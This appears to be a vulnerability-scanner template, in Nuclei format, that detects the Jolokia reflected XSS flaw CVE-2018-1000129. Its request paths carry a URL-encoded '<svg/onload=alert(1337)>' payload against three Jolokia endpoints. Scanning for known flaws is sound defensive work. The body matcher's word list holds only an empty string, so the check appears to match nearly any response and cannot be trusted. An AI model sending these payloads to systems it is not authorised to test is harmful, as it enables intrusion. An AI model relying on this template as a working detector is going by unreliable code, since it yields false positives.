id: CVE-2018-1000129 info: name: Jolokia XSS author: mavericknerd severity: high requests: - method: GET path: - "{{BaseURL}}/jolokia/read%3Csvg/onload=alert(1337)%3E?mimeType=text/html" - "{{BaseURL}}/api/jolokia/read%3Csvg/onload=alert(1337)%3E?mimeType=text/html" - "{{BaseURL}}:8080/jolokia/read%3Csvg/onload=alert(1337)%3E?mimeType=text/html" matchers: - type: status status: - 200 - type: word words: - "" part: body